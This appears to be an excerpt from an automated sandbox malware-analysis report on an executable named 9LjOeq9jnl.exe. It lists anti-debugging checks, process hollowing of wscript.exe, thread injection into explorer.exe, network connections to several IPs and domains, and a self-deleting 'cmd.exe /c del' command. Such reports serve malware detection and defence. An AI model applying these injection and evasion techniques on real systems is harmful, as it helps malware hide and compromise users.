Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE51BE mov eax, dword ptr fs:[00000030h]	17_2_04BE51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE51BE mov eax, dword ptr fs:[00000030h]	17_2_04BE51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE51BE mov eax, dword ptr fs:[00000030h]	17_2_04BE51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE51BE mov eax, dword ptr fs:[00000030h]	17_2_04BE51BE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B91DB5 mov eax, dword ptr fs:[00000030h]	17_2_04B91DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B91DB5 mov eax, dword ptr fs:[00000030h]	17_2_04B91DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B91DB5 mov eax, dword ptr fs:[00000030h]	17_2_04B91DB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B935A1 mov eax, dword ptr fs:[00000030h]	17_2_04B935A1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE69A6 mov eax, dword ptr fs:[00000030h]	17_2_04BE69A6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B961A0 mov eax, dword ptr fs:[00000030h]	17_2_04B961A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B961A0 mov eax, dword ptr fs:[00000030h]	17_2_04B961A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9FD9B mov eax, dword ptr fs:[00000030h]	17_2_04B9FD9B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9FD9B mov eax, dword ptr fs:[00000030h]	17_2_04B9FD9B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B92990 mov eax, dword ptr fs:[00000030h]	17_2_04B92990
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C18DF1 mov eax, dword ptr fs:[00000030h]	17_2_04C18DF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B92581 mov eax, dword ptr fs:[00000030h]	17_2_04B92581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B92581 mov eax, dword ptr fs:[00000030h]	17_2_04B92581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B92581 mov eax, dword ptr fs:[00000030h]	17_2_04B92581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B92581 mov eax, dword ptr fs:[00000030h]	17_2_04B92581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B8C182 mov eax, dword ptr fs:[00000030h]	17_2_04B8C182
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9A185 mov eax, dword ptr fs:[00000030h]	17_2_04B9A185
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B62D8A mov eax, dword ptr fs:[00000030h]	17_2_04B62D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B62D8A mov eax, dword ptr fs:[00000030h]	17_2_04B62D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B62D8A mov eax, dword ptr fs:[00000030h]	17_2_04B62D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B62D8A mov eax, dword ptr fs:[00000030h]	17_2_04B62D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B62D8A mov eax, dword ptr fs:[00000030h]	17_2_04B62D8A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B6B1E1 mov eax, dword ptr fs:[00000030h]	17_2_04B6B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B6B1E1 mov eax, dword ptr fs:[00000030h]	17_2_04B6B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B6B1E1 mov eax, dword ptr fs:[00000030h]	17_2_04B6B1E1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BF41E8 mov eax, dword ptr fs:[00000030h]	17_2_04BF41E8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B7D5E0 mov eax, dword ptr fs:[00000030h]	17_2_04B7D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B7D5E0 mov eax, dword ptr fs:[00000030h]	17_2_04B7D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C305AC mov eax, dword ptr fs:[00000030h]	17_2_04C305AC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C305AC mov eax, dword ptr fs:[00000030h]	17_2_04C305AC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE6DC9 mov eax, dword ptr fs:[00000030h]	17_2_04BE6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE6DC9 mov eax, dword ptr fs:[00000030h]	17_2_04BE6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE6DC9 mov eax, dword ptr fs:[00000030h]	17_2_04BE6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE6DC9 mov ecx, dword ptr fs:[00000030h]	17_2_04BE6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE6DC9 mov eax, dword ptr fs:[00000030h]	17_2_04BE6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE6DC9 mov eax, dword ptr fs:[00000030h]	17_2_04BE6DC9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B94D3B mov eax, dword ptr fs:[00000030h]	17_2_04B94D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B94D3B mov eax, dword ptr fs:[00000030h]	17_2_04B94D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B94D3B mov eax, dword ptr fs:[00000030h]	17_2_04B94D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9513A mov eax, dword ptr fs:[00000030h]	17_2_04B9513A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9513A mov eax, dword ptr fs:[00000030h]	17_2_04B9513A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B73D34 mov eax, dword ptr fs:[00000030h]	17_2_04B73D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B73D34 mov eax, dword ptr fs:[00000030h]	17_2_04B73D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B73D34 mov eax, dword ptr fs:[00000030h]	17_2_04B73D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B73D34 mov eax, dword ptr fs:[00000030h]	17_2_04B73D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B73D34 mov eax, dword ptr fs:[00000030h]	17_2_04B73D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B73D34 mov eax, dword ptr fs:[00000030h]	17_2_04B73D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B73D34 mov eax, dword ptr fs:[00000030h]	17_2_04B73D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B73D34 mov eax, dword ptr fs:[00000030h]	17_2_04B73D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B73D34 mov eax, dword ptr fs:[00000030h]	17_2_04B73D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B73D34 mov eax, dword ptr fs:[00000030h]	17_2_04B73D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B73D34 mov eax, dword ptr fs:[00000030h]	17_2_04B73D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B73D34 mov eax, dword ptr fs:[00000030h]	17_2_04B73D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B73D34 mov eax, dword ptr fs:[00000030h]	17_2_04B73D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B6AD30 mov eax, dword ptr fs:[00000030h]	17_2_04B6AD30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BEA537 mov eax, dword ptr fs:[00000030h]	17_2_04BEA537
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B84120 mov eax, dword ptr fs:[00000030h]	17_2_04B84120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B84120 mov eax, dword ptr fs:[00000030h]	17_2_04B84120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B84120 mov eax, dword ptr fs:[00000030h]	17_2_04B84120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B84120 mov eax, dword ptr fs:[00000030h]	17_2_04B84120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B84120 mov ecx, dword ptr fs:[00000030h]	17_2_04B84120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B69100 mov eax, dword ptr fs:[00000030h]	17_2_04B69100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B69100 mov eax, dword ptr fs:[00000030h]	17_2_04B69100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B69100 mov eax, dword ptr fs:[00000030h]	17_2_04B69100
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B6B171 mov eax, dword ptr fs:[00000030h]	17_2_04B6B171
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B6B171 mov eax, dword ptr fs:[00000030h]	17_2_04B6B171
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B8C577 mov eax, dword ptr fs:[00000030h]	17_2_04B8C577
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B8C577 mov eax, dword ptr fs:[00000030h]	17_2_04B8C577
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B6C962 mov eax, dword ptr fs:[00000030h]	17_2_04B6C962
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B87D50 mov eax, dword ptr fs:[00000030h]	17_2_04B87D50
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C38D34 mov eax, dword ptr fs:[00000030h]	17_2_04C38D34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA3D43 mov eax, dword ptr fs:[00000030h]	17_2_04BA3D43
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B8B944 mov eax, dword ptr fs:[00000030h]	17_2_04B8B944
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B8B944 mov eax, dword ptr fs:[00000030h]	17_2_04B8B944
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE3540 mov eax, dword ptr fs:[00000030h]	17_2_04BE3540
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C1FEC0 mov eax, dword ptr fs:[00000030h]	17_2_04C1FEC0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B7AAB0 mov eax, dword ptr fs:[00000030h]	17_2_04B7AAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B7AAB0 mov eax, dword ptr fs:[00000030h]	17_2_04B7AAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9FAB0 mov eax, dword ptr fs:[00000030h]	17_2_04B9FAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B652A5 mov eax, dword ptr fs:[00000030h]	17_2_04B652A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B652A5 mov eax, dword ptr fs:[00000030h]	17_2_04B652A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B652A5 mov eax, dword ptr fs:[00000030h]	17_2_04B652A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B652A5 mov eax, dword ptr fs:[00000030h]	17_2_04B652A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B652A5 mov eax, dword ptr fs:[00000030h]	17_2_04B652A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C38ED6 mov eax, dword ptr fs:[00000030h]	17_2_04C38ED6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE46A7 mov eax, dword ptr fs:[00000030h]	17_2_04BE46A7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9D294 mov eax, dword ptr fs:[00000030h]	17_2_04B9D294
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9D294 mov eax, dword ptr fs:[00000030h]	17_2_04B9D294
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BFFE87 mov eax, dword ptr fs:[00000030h]	17_2_04BFFE87
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B776E2 mov eax, dword ptr fs:[00000030h]	17_2_04B776E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B916E0 mov ecx, dword ptr fs:[00000030h]	17_2_04B916E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B92AE4 mov eax, dword ptr fs:[00000030h]	17_2_04B92AE4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C30EA5 mov eax, dword ptr fs:[00000030h]	17_2_04C30EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C30EA5 mov eax, dword ptr fs:[00000030h]	17_2_04C30EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C30EA5 mov eax, dword ptr fs:[00000030h]	17_2_04C30EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B92ACB mov eax, dword ptr fs:[00000030h]	17_2_04B92ACB
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B936CC mov eax, dword ptr fs:[00000030h]	17_2_04B936CC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA8EC7 mov eax, dword ptr fs:[00000030h]	17_2_04BA8EC7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B6E620 mov eax, dword ptr fs:[00000030h]	17_2_04B6E620
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA4A2C mov eax, dword ptr fs:[00000030h]	17_2_04BA4A2C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA4A2C mov eax, dword ptr fs:[00000030h]	17_2_04BA4A2C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B6AA16 mov eax, dword ptr fs:[00000030h]	17_2_04B6AA16
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B6AA16 mov eax, dword ptr fs:[00000030h]	17_2_04B6AA16
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C1B260 mov eax, dword ptr fs:[00000030h]	17_2_04C1B260
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C1B260 mov eax, dword ptr fs:[00000030h]	17_2_04C1B260
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C38A62 mov eax, dword ptr fs:[00000030h]	17_2_04C38A62
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B83A1C mov eax, dword ptr fs:[00000030h]	17_2_04B83A1C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9A61C mov eax, dword ptr fs:[00000030h]	17_2_04B9A61C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9A61C mov eax, dword ptr fs:[00000030h]	17_2_04B9A61C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B65210 mov eax, dword ptr fs:[00000030h]	17_2_04B65210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B65210 mov ecx, dword ptr fs:[00000030h]	17_2_04B65210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B65210 mov eax, dword ptr fs:[00000030h]	17_2_04B65210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B65210 mov eax, dword ptr fs:[00000030h]	17_2_04B65210
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B6C600 mov eax, dword ptr fs:[00000030h]	17_2_04B6C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B6C600 mov eax, dword ptr fs:[00000030h]	17_2_04B6C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B6C600 mov eax, dword ptr fs:[00000030h]	17_2_04B6C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B98E00 mov eax, dword ptr fs:[00000030h]	17_2_04B98E00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B78A0A mov eax, dword ptr fs:[00000030h]	17_2_04B78A0A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA927A mov eax, dword ptr fs:[00000030h]	17_2_04BA927A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C21608 mov eax, dword ptr fs:[00000030h]	17_2_04C21608
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B8AE73 mov eax, dword ptr fs:[00000030h]	17_2_04B8AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B8AE73 mov eax, dword ptr fs:[00000030h]	17_2_04B8AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B8AE73 mov eax, dword ptr fs:[00000030h]	17_2_04B8AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B8AE73 mov eax, dword ptr fs:[00000030h]	17_2_04B8AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B8AE73 mov eax, dword ptr fs:[00000030h]	17_2_04B8AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B7766D mov eax, dword ptr fs:[00000030h]	17_2_04B7766D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BF4257 mov eax, dword ptr fs:[00000030h]	17_2_04BF4257
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B69240 mov eax, dword ptr fs:[00000030h]	17_2_04B69240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B69240 mov eax, dword ptr fs:[00000030h]	17_2_04B69240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B69240 mov eax, dword ptr fs:[00000030h]	17_2_04B69240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B69240 mov eax, dword ptr fs:[00000030h]	17_2_04B69240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B77E41 mov eax, dword ptr fs:[00000030h]	17_2_04B77E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B77E41 mov eax, dword ptr fs:[00000030h]	17_2_04B77E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B77E41 mov eax, dword ptr fs:[00000030h]	17_2_04B77E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B77E41 mov eax, dword ptr fs:[00000030h]	17_2_04B77E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B77E41 mov eax, dword ptr fs:[00000030h]	17_2_04B77E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B77E41 mov eax, dword ptr fs:[00000030h]	17_2_04B77E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C1FE3F mov eax, dword ptr fs:[00000030h]	17_2_04C1FE3F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B94BAD mov eax, dword ptr fs:[00000030h]	17_2_04B94BAD
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B94BAD mov eax, dword ptr fs:[00000030h]	17_2_04B94BAD
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B94BAD mov eax, dword ptr fs:[00000030h]	17_2_04B94BAD
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B78794 mov eax, dword ptr fs:[00000030h]	17_2_04B78794
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9B390 mov eax, dword ptr fs:[00000030h]	17_2_04B9B390
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE7794 mov eax, dword ptr fs:[00000030h]	17_2_04BE7794
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE7794 mov eax, dword ptr fs:[00000030h]	17_2_04BE7794
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE7794 mov eax, dword ptr fs:[00000030h]	17_2_04BE7794
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B92397 mov eax, dword ptr fs:[00000030h]	17_2_04B92397
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B71B8F mov eax, dword ptr fs:[00000030h]	17_2_04B71B8F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B71B8F mov eax, dword ptr fs:[00000030h]	17_2_04B71B8F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C1D380 mov ecx, dword ptr fs:[00000030h]	17_2_04C1D380
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C2138A mov eax, dword ptr fs:[00000030h]	17_2_04C2138A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BA37F5 mov eax, dword ptr fs:[00000030h]	17_2_04BA37F5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B8DBE9 mov eax, dword ptr fs:[00000030h]	17_2_04B8DBE9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B903E2 mov eax, dword ptr fs:[00000030h]	17_2_04B903E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B903E2 mov eax, dword ptr fs:[00000030h]	17_2_04B903E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B903E2 mov eax, dword ptr fs:[00000030h]	17_2_04B903E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B903E2 mov eax, dword ptr fs:[00000030h]	17_2_04B903E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B903E2 mov eax, dword ptr fs:[00000030h]	17_2_04B903E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B903E2 mov eax, dword ptr fs:[00000030h]	17_2_04B903E2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C35BA5 mov eax, dword ptr fs:[00000030h]	17_2_04C35BA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE53CA mov eax, dword ptr fs:[00000030h]	17_2_04BE53CA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BE53CA mov eax, dword ptr fs:[00000030h]	17_2_04BE53CA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9E730 mov eax, dword ptr fs:[00000030h]	17_2_04B9E730
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B64F2E mov eax, dword ptr fs:[00000030h]	17_2_04B64F2E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B64F2E mov eax, dword ptr fs:[00000030h]	17_2_04B64F2E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C38B58 mov eax, dword ptr fs:[00000030h]	17_2_04C38B58
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C38F6A mov eax, dword ptr fs:[00000030h]	17_2_04C38F6A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B8F716 mov eax, dword ptr fs:[00000030h]	17_2_04B8F716
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BFFF10 mov eax, dword ptr fs:[00000030h]	17_2_04BFFF10
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04BFFF10 mov eax, dword ptr fs:[00000030h]	17_2_04BFFF10
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9A70E mov eax, dword ptr fs:[00000030h]	17_2_04B9A70E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B9A70E mov eax, dword ptr fs:[00000030h]	17_2_04B9A70E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B93B7A mov eax, dword ptr fs:[00000030h]	17_2_04B93B7A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B93B7A mov eax, dword ptr fs:[00000030h]	17_2_04B93B7A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C3070D mov eax, dword ptr fs:[00000030h]	17_2_04C3070D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C3070D mov eax, dword ptr fs:[00000030h]	17_2_04C3070D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B6DB60 mov ecx, dword ptr fs:[00000030h]	17_2_04B6DB60
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B7FF60 mov eax, dword ptr fs:[00000030h]	17_2_04B7FF60
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C2131B mov eax, dword ptr fs:[00000030h]	17_2_04C2131B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B6F358 mov eax, dword ptr fs:[00000030h]	17_2_04B6F358
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B6DB40 mov eax, dword ptr fs:[00000030h]	17_2_04B6DB40
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04B7EF40 mov eax, dword ptr fs:[00000030h]	17_2_04B7EF40

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe

Code function: 7_2_00409B40 LdrLoadDll,

7_2_00409B40

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 142.111.24.2 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.repsychel.com
Source: C:\Windows\explorer.exe	Domain query: www.flex-aportelabels.com
Source: C:\Windows\explorer.exe	Network Connect: 46.38.243.234 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 62.233.121.61 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.christasconezntreats.com
Source: C:\Windows\explorer.exe	Domain query: www.qumpan.com

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe

Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 13C0000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Thread register set: target process: 3352	Jump to behavior

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process created: C:\Users\user\Desktop\9LjOeq9jnl.exe C:\Users\user\Desktop\9LjOeq9jnl.exe	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process created: C:\Users\user\Desktop\9LjOeq9jnl.exe C:\Users\user\Desktop\9LjOeq9jnl.exe	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process created: C:\Users\user\Desktop\9LjOeq9jnl.exe C:\Users\user\Desktop\9LjOeq9jnl.exe	Jump to behavior
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\9LjOeq9jnl.exe'	Jump to behavior

Source: explorer.exe, 00000008.00000000.389495748.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 00000008.00000000.369398620.00000000011E0000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.563276008.00000000033F0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.393635775.0000000005E10000.00000004.00000001.sdmp, wscript.exe, 00000011.00000002.563276008.00000000033F0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
